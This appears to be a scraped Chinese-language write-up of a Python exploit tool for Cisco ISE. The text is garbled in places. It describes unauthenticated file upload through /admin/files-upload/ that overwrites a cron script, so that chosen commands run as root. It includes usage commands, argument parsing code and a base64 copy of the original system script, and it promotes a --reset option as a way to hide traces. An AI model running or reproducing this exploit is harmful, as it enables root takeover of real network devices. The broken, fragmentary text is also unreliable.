xmlns="http://www.w3.org/2000/svg"style="display:利用工具。该工具展示了如何通过未授权的文件上传功能,将恶意文件植入目标系统,最终实现以Root权限执行任意命令。功能特性未授权利用:利用/admin/files-upload/接口,无需任何身份验证即可上传文件。命令注入:允许攻击者在目标系统上以Root权限执行任意系统命令。文件恢复:提供--reset参数,可将被篡改的系统文件恢复到原始状态,增加了隐蔽性和可测试性。自动化打包:自动创建恶意文件并打包成ZIP压缩包,模拟目标系统的文件结构。权限提升:利用系统计划任务,将普通命令执行提升为最高权限(Root)的执行。安装指南系统要求PythonCisco设备依赖项本脚本仅依赖Python标准库,无需安装额外的第三方包。安装步骤将本项目的Python设备的网络互通。赋予脚本执行权限(如果需要):chmod+xexploit.py使用说明基础使用示例该脚本通过命令行参数指定目标Cisco权限执行id命令,并将结果写入/tmp/pwned文件。pythonexploit.py/tmp/pwned"执行流程:脚本创建一个临时的bin下生成isehourlycron.sh文件,内容为原始系统脚本+您指定的命令。将bin目录打包成output.zip。将output.zip通过未授权接口上传到目标服务器(192.168.1.100)。目标系统会自动解压该文件,覆盖/opt/CSCOcpm/bin/isehourlycron.sh。等待系统计划任务执行该脚本,您指定的命令将以Root恢复原始文件如果您需要清除痕迹或恢复到初始状态,可以使用--reset参数。pythonexploit.py--reset该命令会上传一个只包含原始内容、不含恶意命令的isehourlycron.sh文件,覆盖被篡改的文件。参数概览align="left">描述align="left">--ipalign="left">stralign="left">目标align="left">--commandalign="left">stralign="left">要在目标系统上执行的命令。align="left">--resetalign="left">flagalign="left">重置模式。如果设置此标志,将忽略--command,恢复原始文件。核心代码1.参数解析与配置脚本使用argparse解析用户输入的参数,包括目标IP、要执行的命令以及重置标志。这些参数决定了脚本的运行模式。importargparseparser=argparse.ArgumentParser(description="PoCwithbehavior.")parser.add_argument('--reset',action='store_true',help='Triggerresetbehavior')parser.add_argument('--command',type=str,required=True,help='Commandexecuted')parser.add_argument('--ip',type=str,required=True,help='Targetaddress')args=parser.parse_args()COMMAND=args.commandIP=args.ip2.恶意文件生成脚本的核心逻辑之一是生成被篡改的系统文件。原始系统文件内容以Base64编码硬编码在脚本中。解码后,脚本会根据--reset标志决定是在文件末尾追加恶意命令,还是保留原始内容。#Originalisehourlycron.shisehourlycron="IyEvYmluL3NoCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIwojICAgICBGaWxlbmFtZTogaXNlaG91cmx5Y3Jvbi5zaAojICBEZXNjcmlwdGlvbjogU2hlbGwgc2NyaXB0IHRvIHBlcmZvcm0gaG91cmx5IGNsZWFudXAKIyAgICAgICAgVXNhZ2U6IENhbGxlZCBmcm9tIHN5c3RlbSBzY2hlZHVsZXIKIyAgICAgICBBdXRob3I6IGVkZGllbUBjaXNjby5jb20KIwojIENvcHlyaWdodCAoYykgMjAwOS0yMDE1IENpc2NvIFN5c3RlbXMsIEluYy4gIFRoaXMgcHJvZ3JhbSBjb250YWlucwojIHByb3ByaWV0YXJ5IGFuZCBjb25maWRlbnRpYWwgaW5mb3JtYXRpb24uICBBbGwgcmlnaHRzIHJlc2VydmVkCiMgZXhjZXB0IGFzIG1heSBiZSBwZXJtaXR0ZWQgYnkgcHJpb3Igd3JpdHRlbiBjb25zZW50LgojCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIwoKc291cmNlIC9vcHQvQ1NDT2NwbS9jb25maWcvY3BtZW52LnNoCgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tIwojIElmIGF2YWlsYWJsZSBmaWxlc3lzdGVtIHNwYWNlIGRyb3BzIGJlbG93IDVHYiwgYW5kIHVuZG8gCiMgdW5kbyB0YWJsZXNwYWNlIGlzIG92ZXIgMTBHYiwgdGhlbiBkcm9wIGFuZCByZWNyZWF0ZQojIHRoZSB1bmRvIHRhYmxlc3BhY2UKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLSMKY2xlYW51cHVuZG90YWJsZXNwYWNlKCkKewogIAogICAgY2F0ID4gL3RtcC9kcm9wdW5kby5zcWwgPDwgRU9GCnNldCBzZXJ2ZXJvdXQgb247CmRlY2xhcmUKdmFyIHZhcmNoYXIyKDEwMDApOwpiZWdpbgpiZWdpbgpleGVjdXRlIGltbWVkaWF0ZSAnc2VsZWN0IE5BTUUgZnJvbSB1bmRvZHJvcCcgaW50byB2YXIgOwpFWENFUFRJT04gV0hFTiBPVEhFUlMgVEhFTiBudWxsOwpyZXR1cm47CmVuZDsKaWYgICB2YXI9Jw=="#--reset(后续处理逻辑)```FINISHED6HFtX5dABrKlqXeO5PUv/8+rhoeqMCA1qzr2lMYiJ3GXrjM2WSU9FiWwYwOtmhhT更多精彩内容对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号(网络安全技术点滴分享)